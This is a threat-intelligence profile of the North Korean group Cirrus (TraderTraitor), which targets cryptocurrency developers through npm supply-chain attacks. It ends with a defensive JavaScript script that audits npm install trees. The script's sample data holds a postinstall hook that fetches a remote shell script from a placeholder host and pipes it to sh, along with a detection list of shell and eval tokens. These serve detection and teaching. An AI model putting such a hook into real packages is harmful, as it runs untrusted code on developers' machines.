Nation-State Actor
Cirrus (DPRK)
North Korea • Active since 2022
Cirrus is a North Korean state-sponsored group that targets cryptocurrency and blockchain companies. It social-engineers developers into running malicious code, then steals cryptocurrency that funds the DPRK regime.
Overview
Cirrus is a North Korean threat actor specializing in software supply chain compromise and the targeting of blockchain developers. It has conducted sophisticated intrusions against cryptocurrency exchanges and Web3 companies.
Also Known As
TraderTraitor, Jade Sleet, UNC4899
Target Industries
Cryptocurrency, Blockchain, Financial Technology, Software Development
Target Regions
Global, United States, Europe, Asia
Tactics, Techniques & Procedures
- Supply chain compromise via npm packages
- Social engineering of developers
- Cryptocurrency wallet theft
- macOS malware deployment
Known Tools & Malware
TraderTraitor malware, npm malicious packages, KANDYKORN, SockSocket
Notable Campaigns
npm Package Compromise (2023)
Published malicious npm packages targeting blockchain developers.
Crypto Exchange Intrusions (2022-2024)
Targeted multiple cryptocurrency exchanges, resulting in significant fund theft.
MITRE ATT&CK Techniques
T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1566.003 (Phishing: Spearphishing via Service), T1059.007 (Command and Scripting Interpreter: JavaScript), T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage)
Defense Recommendations
1. Audit npm dependencies for suspicious packages (unexpected install scripts, packages resolved outside the public registry, lockfile entries without integrity hashes)
2. Implement software composition analysis
3. Train developers on social engineering threats
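The npm supply chain TTP listed above and recommendations 1 and 2 come down to one concrete check: does anything in the install tree run code at install time or arrive from somewhere other than the registry? The script below is an added example, not the page's or any vendor's tooling. It audits manifests shaped like node_modules/<name>/package.json against the "packages" map of a v2/v3 package-lock.json. The package names, URLs and hashes in the sample data are constructed for the example; `web3-utils-helper` and `eth-sig-tools` are hypothetical names.

```javascript
// Added example, not the page's or the vendor's own tooling: a lightweight
// audit over an npm install tree that flags the signals a malicious package
// most often carries. Input shapes mirror node_modules/<name>/package.json
// and the "packages" map of a v2/v3 package-lock.json. All package names,
// URLs and hashes below are constructed for the example.

// Lifecycle hooks npm runs for a dependency installed from the registry;
// this is where a trojanized package executes its payload.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const TRUSTED_REGISTRY = "https://registry.npmjs.org/";
// Heuristic tokens that rarely belong in a legitimate install hook.
const SUSPICIOUS_TOKENS = [/\bcurl\b/, /\bwget\b/, /node\s+-e\b/, /\beval\(/, /base64/i, /child_process/];

// Returns the findings for one installed package (empty array = clean).
function auditPackage(manifest, lockEntry) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const body = scripts[hook];
    if (!body) continue;
    findings.push(`install hook "${hook}": ${body}`);
    const hit = SUSPICIOUS_TOKENS.find((re) => re.test(body));
    if (hit) findings.push(`suspicious token ${hit} in ${hook} script`);
  }
  if (!lockEntry) {
    findings.push("present in node_modules but absent from package-lock.json");
    return findings;
  }
  const resolved = lockEntry.resolved || "";
  if (!resolved.startsWith(TRUSTED_REGISTRY)) {
    findings.push(`resolved outside the public registry: ${resolved || "(none)"}`);
  }
  if (!lockEntry.integrity) {
    findings.push("no integrity hash in package-lock.json");
  }
  return findings;
}

// Audits every manifest against the lockfile; returns { name: [findings] }
// for flagged packages only.
function auditTree(manifests, lockPackages) {
  const report = {};
  for (const m of manifests) {
    const findings = auditPackage(m, lockPackages[`node_modules/${m.name}`]);
    if (findings.length > 0) report[m.name] = findings;
  }
  return report;
}

// Constructed sample: one clean package, one with a network-fetching
// postinstall hook, one pulled from an off-registry tarball with no hash.
const SAMPLE_MANIFESTS = [
  { name: "lodash", version: "4.17.21", scripts: { test: "mocha" } },
  {
    name: "web3-utils-helper", // hypothetical package name
    version: "1.0.2",
    scripts: { postinstall: "node -e \"require('child_process').exec('curl -s https://example.invalid/s.sh | sh')\"" },
  },
  { name: "eth-sig-tools", version: "0.3.0", scripts: { build: "tsc" } }, // hypothetical package name
];
const SAMPLE_LOCK = {
  "node_modules/lodash": {
    version: "4.17.21",
    resolved: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
    integrity: "sha512-<constructed>",
  },
  "node_modules/web3-utils-helper": {
    version: "1.0.2",
    resolved: "https://registry.npmjs.org/web3-utils-helper/-/web3-utils-helper-1.0.2.tgz",
    integrity: "sha512-<constructed>",
  },
  "node_modules/eth-sig-tools": {
    version: "0.3.0",
    resolved: "https://cdn.example.invalid/eth-sig-tools-0.3.0.tgz",
  },
};

console.log(JSON.stringify(auditTree(SAMPLE_MANIFESTS, SAMPLE_LOCK), null, 2));
```

On the sample data the clean package produces nothing, the package with the `curl | sh` postinstall hook is flagged twice (hook present, suspicious token), and the off-registry package is flagged for both its resolved URL and its missing integrity hash. To use it on a real project, replace the constructed arrays with the manifests read from node_modules and the lockfile's packages map, treat any install hook on a dependency you did not expect as a blocker, and run installs in CI with `npm ci --ignore-scripts` so hooks cannot execute before review.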